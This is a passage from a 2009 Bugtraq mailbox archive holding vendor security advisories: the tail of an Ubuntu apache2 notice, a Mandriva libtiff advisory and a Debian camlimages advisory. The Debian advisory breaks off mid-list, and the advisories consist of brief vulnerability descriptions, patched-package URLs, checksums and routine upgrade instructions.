    http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-src_2.2.11-2ubuntu2.2_all.deb
      Size/MD5:  6946286 067a7635b8627b031b9eb9cf0cc847bf

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   258646 7446874f9db13dea5da20f225024f477
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   252848 823147209be87ff9322c276a8e2beace
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   258024 6bfdbf469c0b0ba45e543bf7688ac5ee
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   212932 aeeb0ccb1f8e72a15aaf08450a056c1c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   213906 8621b4d1d85ab19f154a86ec465fa316
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   150776 f7def056c536f9b1a329a3b6fef43b7f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:   826672 e18163156730829c91161191ee00b340
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:    87442 39f0e4aaf42e4bb049da17f26a0d9c25
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.2_amd64.deb
      Size/MD5:    85730 a11a39f7102937e5d00b03190ff42a60

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   245132 c7202ff8f066903e207ebff93557644a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   239670 18279b3faf8344f9e7f903862114c998
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   244518 c24b66a4a61c2af8edf32b10867cf958
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   212922 a009d9ba9486ba53a3441ca2a48bc9d8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   213898 6e26de281d137dfab7dbc700ca1f7eb5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   149678 d4499d622b98d7a9ed3a1b700f954e95
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:   783924 45fbb8ab4bfa3297b0e04231677f86a1
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:    86818 9d01aae1849d4ccc93c64e7640912b64
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.2_i386.deb
      Size/MD5:    85222 0a3f70a6697f945a1acec0629edd8586

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   242014 0b9676d42353eae308b923ac2c2172d7
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   236570 d42595dd3d5229a7db2f4a6b3047a372
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   241440 3cfa67183c677cc44fc9f0354231978b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   212924 83433f6847c191927c8bb5234339416a
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   213902 4be2d9e80eabaea30169e3fa39ebe3d8
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   149396 20350717c1cebdf372f0d11d09374852
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:   773130 cbed31d2962a5e0c77a400434f9b7ff4
    http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:    86764 6a9b7a0a9015044fff19ff9bf479fbc3
    http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.2_lpia.deb
      Size/MD5:    85188 2d685381871858d3c685da5a2b44f0f7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   265094 41f064e2daa4ddaf422bcd5013163c11
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   260042 f60b2311f40da9c254fc7583a6a4215a
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   264720 80ba36d44ae08be1f5593b9d60c873e9
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   212934 a35fed013193cf2d0c021baaac793a13
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   213912 d6f400db5f98bb345b063b5a191735fc
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   164086 36c7ab8da76606f2a1fa12328cd35123
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:   932026 9a66083f7211f75a083c20a94efebf12
    http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:    87516 8a913c9fd0b3f6e7c71cfb6ce6345702
    http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.2_powerpc.deb
      Size/MD5:    85794 c74337f58c4bad32e2ca1349a182696a

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   250414 dd2f00b98a1089c03950010ee4feacdc
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   244704 9748c6a30dd03d7a94b7ee0e5cbbf37c
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   249756 68a0607bb1d915a1da034f3ecda6e492
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   212924 03ceb43c9e4494db9ce8e2375edadd5b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   213900 c17c6bdc630a6229922c969f94988c32
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   153928 0109fff49b9f806f9de07f2fbac15945
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:   788928 11998be7f1d0a6f1952646df23936645
    http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:    87010 a87263816f682082b234a7b3421b3729
    http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.2_sparc.deb
      Size/MD5:    85318 a17451cf2fa5597b4bb6abb2145f2a55



--=-FVS3B1aya6v7ikEJdJim
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkpbi+8ACgkQLMAs/0C4zNo8pgCcDPNYLgfE+c/z83DyWrh8tNZX
CAYAn2f2j4End9dkVWwDV1nxWLs/9gJ4
=unIj
-----END PGP SIGNATURE-----

--=-FVS3B1aya6v7ikEJdJim--

From - Mon Jul 13 17:54:07 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c76
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40840-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 2EA11EC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 17:13:35 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 439F314377C; Mon, 13 Jul 2009 15:08:29 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25108 invoked from network); 13 Jul 2009 20:41:37 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:150 ] libtiff
Date: Mon, 13 Jul 2009 22:42:01 +0200
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1MQSLZ-0005ON-R6@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:150
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libtiff
 Date    : July 13, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in libtiff:
 
 Buffer underflow in the LZWDecodeCompat function in libtiff 3.8.2
 allows context-dependent attackers to cause a denial of service (crash)
 via a crafted TIFF image, a different vulnerability than CVE-2008-2327
 (CVE-2009-2285).
 
 Fix several places in tiff2rgba and rgb2ycbcr that were being careless
 about possible integer overflow in calculation of buffer sizes
 (CVE-2009-2347).
 
 This update provides fixes for these vulnerabilities.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2285
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2347
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 7c56d843d17efce1717654ceb4efe3e1  2008.1/i586/libtiff3-3.8.2-10.2mdv2008.1.i586.rpm
 9d02ed754eafe7a33b2fb4b5a8e7b1d1  2008.1/i586/libtiff3-devel-3.8.2-10.2mdv2008.1.i586.rpm
 619b12e1013c645db1aca659b1ea6805  2008.1/i586/libtiff3-static-devel-3.8.2-10.2mdv2008.1.i586.rpm
 5d94641411d637493e7e413045fa82a9  2008.1/i586/libtiff-progs-3.8.2-10.2mdv2008.1.i586.rpm 
 73795a036f1b81ca0c1233df6f7d8fad  2008.1/SRPMS/libtiff-3.8.2-10.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 52e0eb4a0230bbdb245b787ba53c0903  2008.1/x86_64/lib64tiff3-3.8.2-10.2mdv2008.1.x86_64.rpm
 147525496bca6fcee3a741f2350e8441  2008.1/x86_64/lib64tiff3-devel-3.8.2-10.2mdv2008.1.x86_64.rpm
 c4ed6f9405dcb64edfebba00272f7596  2008.1/x86_64/lib64tiff3-static-devel-3.8.2-10.2mdv2008.1.x86_64.rpm
 0844ecf1e6941fbde9fc358e34a3136e  2008.1/x86_64/libtiff-progs-3.8.2-10.2mdv2008.1.x86_64.rpm 
 73795a036f1b81ca0c1233df6f7d8fad  2008.1/SRPMS/libtiff-3.8.2-10.2mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 75efa7472bffceaecb10016c22621de7  2009.0/i586/libtiff3-3.8.2-12.1mdv2009.0.i586.rpm
 aa82f5e49bb942688cbc85d55318b290  2009.0/i586/libtiff3-devel-3.8.2-12.1mdv2009.0.i586.rpm
 0a93799b79a70ab2a900d12030907e78  2009.0/i586/libtiff3-static-devel-3.8.2-12.1mdv2009.0.i586.rpm
 efe9ac463f0b551859c8349c8c63e288  2009.0/i586/libtiff-progs-3.8.2-12.1mdv2009.0.i586.rpm 
 52799196d155f1582dbf5a76ffd93e0e  2009.0/SRPMS/libtiff-3.8.2-12.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 89138d743bbf89abf1f0f879bc2ed829  2009.0/x86_64/lib64tiff3-3.8.2-12.1mdv2009.0.x86_64.rpm
 f5f55f26af4641878dc3a057a764f83a  2009.0/x86_64/lib64tiff3-devel-3.8.2-12.1mdv2009.0.x86_64.rpm
 5a99217d3a034504b4fc4d120764d793  2009.0/x86_64/lib64tiff3-static-devel-3.8.2-12.1mdv2009.0.x86_64.rpm
 5abd09147419ec5b4008306a424c22d8  2009.0/x86_64/libtiff-progs-3.8.2-12.1mdv2009.0.x86_64.rpm 
 52799196d155f1582dbf5a76ffd93e0e  2009.0/SRPMS/libtiff-3.8.2-12.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 0a1eace7d782a42df040267874fed9f1  2009.1/i586/libtiff3-3.8.2-13.1mdv2009.1.i586.rpm
 7dd6bd104131b115130e6feeba9d4766  2009.1/i586/libtiff3-devel-3.8.2-13.1mdv2009.1.i586.rpm
 32658d8a98def2e32a757bfb6ea64d28  2009.1/i586/libtiff3-static-devel-3.8.2-13.1mdv2009.1.i586.rpm
 53d18d66fc849a6128e5961d95892e7c  2009.1/i586/libtiff-progs-3.8.2-13.1mdv2009.1.i586.rpm 
 27b6b2d285832c2ab5e8a2c25a6102b3  2009.1/SRPMS/libtiff-3.8.2-13.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 26516d312785c5f9e2a5f37e1651ffbb  2009.1/x86_64/lib64tiff3-3.8.2-13.1mdv2009.1.x86_64.rpm
 91e72dcc4d1866b7978dfcd493393d2e  2009.1/x86_64/lib64tiff3-devel-3.8.2-13.1mdv2009.1.x86_64.rpm
 9a4d6177df03395106d00e7f8a009e2b  2009.1/x86_64/lib64tiff3-static-devel-3.8.2-13.1mdv2009.1.x86_64.rpm
 b0cffa6ebb21e850847089cad50f1e7a  2009.1/x86_64/libtiff-progs-3.8.2-13.1mdv2009.1.x86_64.rpm 
 27b6b2d285832c2ab5e8a2c25a6102b3  2009.1/SRPMS/libtiff-3.8.2-13.1mdv2009.1.src.rpm

 Corporate 3.0:
 5e5facf365d83f647ba3b1c0afecb8c8  corporate/3.0/i586/libtiff3-3.5.7-11.15.C30mdk.i586.rpm
 288ab11a153d4df48c4fadadfab0b653  corporate/3.0/i586/libtiff3-devel-3.5.7-11.15.C30mdk.i586.rpm
 0fa52891fc9cafff6d4b6de9d8a23262  corporate/3.0/i586/libtiff3-static-devel-3.5.7-11.15.C30mdk.i586.rpm
 c4ba5b9ab1caf7cff8addc84d778f4d4  corporate/3.0/i586/libtiff-progs-3.5.7-11.15.C30mdk.i586.rpm 
 72c81050e7296c63de08282f2f369283  corporate/3.0/SRPMS/libtiff-3.5.7-11.15.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 092479cb8de7b269197d06595b68f71c  corporate/3.0/x86_64/lib64tiff3-3.5.7-11.15.C30mdk.x86_64.rpm
 ea7f46c3e639d24f40449b599f5b2382  corporate/3.0/x86_64/lib64tiff3-devel-3.5.7-11.15.C30mdk.x86_64.rpm
 b414cd225488b9a68bbfc611fc72924f  corporate/3.0/x86_64/lib64tiff3-static-devel-3.5.7-11.15.C30mdk.x86_64.rpm
 9f008c60f557b086915e65e78a56ecfd  corporate/3.0/x86_64/libtiff-progs-3.5.7-11.15.C30mdk.x86_64.rpm 
 72c81050e7296c63de08282f2f369283  corporate/3.0/SRPMS/libtiff-3.5.7-11.15.C30mdk.src.rpm

 Corporate 4.0:
 25cd088ef8715634db5dedd68611125e  corporate/4.0/i586/libtiff3-3.6.1-12.8.20060mlcs4.i586.rpm
 e0df8bc6f18fa4e8585734a1541e6849  corporate/4.0/i586/libtiff3-devel-3.6.1-12.8.20060mlcs4.i586.rpm
 b44feabddefea2f192782b6ae313045c  corporate/4.0/i586/libtiff3-static-devel-3.6.1-12.8.20060mlcs4.i586.rpm
 8beb0af53dd07fb685c61a507dda9a00  corporate/4.0/i586/libtiff-progs-3.6.1-12.8.20060mlcs4.i586.rpm 
 b205c0dc185b0a55bd5521d3f6e416f0  corporate/4.0/SRPMS/libtiff-3.6.1-12.8.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 36e6479eacb594dfbb34deff16b99ba5  corporate/4.0/x86_64/lib64tiff3-3.6.1-12.8.20060mlcs4.x86_64.rpm
 0c37e2b3981cb44f25734ad4903aad11  corporate/4.0/x86_64/lib64tiff3-devel-3.6.1-12.8.20060mlcs4.x86_64.rpm
 08a1408d4aef9a858900c2e7444d2b66  corporate/4.0/x86_64/lib64tiff3-static-devel-3.6.1-12.8.20060mlcs4.x86_64.rpm
 ff20e3e86ddb53df420bb3ce78f894ac  corporate/4.0/x86_64/libtiff-progs-3.6.1-12.8.20060mlcs4.x86_64.rpm 
 b205c0dc185b0a55bd5521d3f6e416f0  corporate/4.0/SRPMS/libtiff-3.6.1-12.8.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 134c05da89014e53836b7e6a230a766d  mnf/2.0/i586/libtiff3-3.5.7-11.15.C30mdk.i586.rpm
 81c805e63e9c9c98e135c9b7a6cc1925  mnf/2.0/i586/libtiff3-devel-3.5.7-11.15.C30mdk.i586.rpm
 9aa2e598ce292505a2ef2f3718401e05  mnf/2.0/i586/libtiff3-static-devel-3.5.7-11.15.C30mdk.i586.rpm
 cefb377ab47ead9e47594e9b9e78b676  mnf/2.0/i586/libtiff-progs-3.5.7-11.15.C30mdk.i586.rpm 
 b34af1bd2ec1986ff9dc65efe5d87c43  mnf/2.0/SRPMS/libtiff-3.5.7-11.15.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKW3ZnmqjQ0CJFipgRAnkvAJ98BXT7+cg9tL9H8hucbF5UmcpcPQCgko2O
HW+jXwDDqrNF1u8bY2AmHLA=vJdX
-----END PGP SIGNATURE-----

From - Mon Jul 13 17:54:07 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c77
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40839-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 915E6EC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 17:22:46 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8479B143764; Mon, 13 Jul 2009 15:08:21 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24159 invoked from network); 13 Jul 2009 20:22:57 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@loeki.tv>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Flag: NO
X-Spam-Score: -9.58
X-Spam-Level: 
X-Spam-Status: No, score=-9.58 tagged_above=-10000 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
autolearn=ham
From: Thijs Kinkhorst <thijs@debian.org>
Message-Id: <20090713202333.03B8AC039@morgana.loeki.tv>
Date: Mon, 13 Jul 2009 22:23:33 +0200 (CEST)
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1832-1] New camlimages packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <yhyzIpSa1YO.A.McE.Nf5WKB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 13 Jul 2009 20:23:41 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1832-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
July 13, 2009                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : camlimages
Vulnerability  : integer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2009-2295
Debian Bug     : 535909

Tielei Wang discovered that CamlImages, an open source image processing
library, suffers from several integer overflows which may lead to a
potentially exploitable heap overflow and result in arbitrary code
execution.

For the old stable distribution (etch), this problem has been fixed in
version 2.20-8+etch1.

For the stable distribution (lenny), this problem has been fixed in
version 2.2.0-4+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 3.0.1-2.

We recommend that you upgrade your camlimages package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/c/camlimages/camlimages_2.20-8+etch1.diff.gz
    Size/MD5 checksum:     8737 1616ade3176c67bc862f7672d4c056dd
  http://security.debian.org/pool/updates/main/c/camlimages/camlimages_2.20-8+etch1.dsc
    Size/MD5 checksum:     1196 0407fcb4b885258c0b81e979e03df7c4
  http://security.debian.org/pool/updates/main/c/camlimages/camlimages_2.20.orig.tar.gz
    Size/MD5 checksum:  1385525 d933eb58c7983f70b1a000fa01893aa4

Architecture independent packages:

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-doc_2.20-8+etch1_all.deb
    Size/MD5 checksum:   599282 578f54fe1370704e0bc80dfdf8a20049

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_alpha.deb
    Size/MD5 checksum:   973198 2d06cc1c9c73ec3a5078df33dde45279
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_alpha.deb
    Size/MD5 checksum:    28966 acc9643b4efed997dcc1f8c1315b3936

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_amd64.deb
    Size/MD5 checksum:    27906 f2fc6d36ca1b496ff82cbe55c975d96d
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_amd64.deb
    Size/MD5 checksum:   870676 b114baff0ce4169f42847cad2f7f87e1

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_arm.deb
    Size/MD5 checksum:    25642 a123f0ffd1dcca413f2eca85d047a81c
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_arm.deb
    Size/MD5 checksum:   885436 99897af751a474b339b8ba01cd10c0b8

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_hppa.deb
    Size/MD5 checksum:   482368 635d36e2aec2e709b5b79e8074ab4a24
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_hppa.deb
    Size/MD5 checksum:    29834 b99951421ced2015ed118b4ca60cdde8

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_i386.deb
    Size/MD5 checksum:    24224 480002667928107c5a379008abcb6710
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_i386.deb
    Size/MD5 checksum:   772576 483bf540a811aa854565ec26f0812de0

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_ia64.deb
    Size/MD5 checksum:  1100896 2a5f01d40983c0dbb473f0efbc814b5f
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_ia64.deb
    Size/MD5 checksum:    36206 8bbbfd674e78d5cbfde79761aa935e34

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_mips.deb
    Size/MD5 checksum:   467010 de4da1b7baf6df72e8d2efaaa3f92341
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_mips.deb
    Size/MD5 checksum:    25614 6504eb3683990a8d733025d05c590534

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_mipsel.deb
    Size/MD5 checksum:   427210 a51713da2bc7d1670dc00b99863ca0f2
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_mipsel.deb
    Size/MD5 checksum:    25566 eeb7c800c5cafff30eb2419a2b6c841c

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_powerpc.deb
    Size/MD5 checksum:   963708 2cdc2329f6102615fded0b247e8f854b
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_powerpc.deb
    Size/MD5 checksum:    32812 924085f56d6b5e3585fa4017f377b416

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.20-8+etch1_sparc.deb
    Size/MD5 checksum:    24596 cee3b23510a181598d7a8fa96b1c0d5b
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.20-8+etch1_sparc.deb
    Size/MD5 checksum:   934718 ebc2899241e369cfbfecce8ce87646c7

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/c/camlimages/camlimages_2.2.0-4+lenny1.diff.gz
    Size/MD5 checksum:     9707 3c88dc5e8528e685876485d310edf1c4
  http://security.debian.org/pool/updates/main/c/camlimages/camlimages_2.2.0-4+lenny1.dsc
    Size/MD5 checksum:     1993 06d190174afce7dbe2d337bf3577c0a8
  http://security.debian.org/pool/updates/main/c/camlimages/camlimages_2.2.0.orig.tar.gz
    Size/MD5 checksum:  1385525 d933eb58c7983f70b1a000fa01893aa4

Architecture independent packages:

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-doc_2.2.0-4+lenny1_all.deb
    Size/MD5 checksum:   601364 577c511958087e582e893a4f174fa31c

alpha architecture (DEC Alpha)

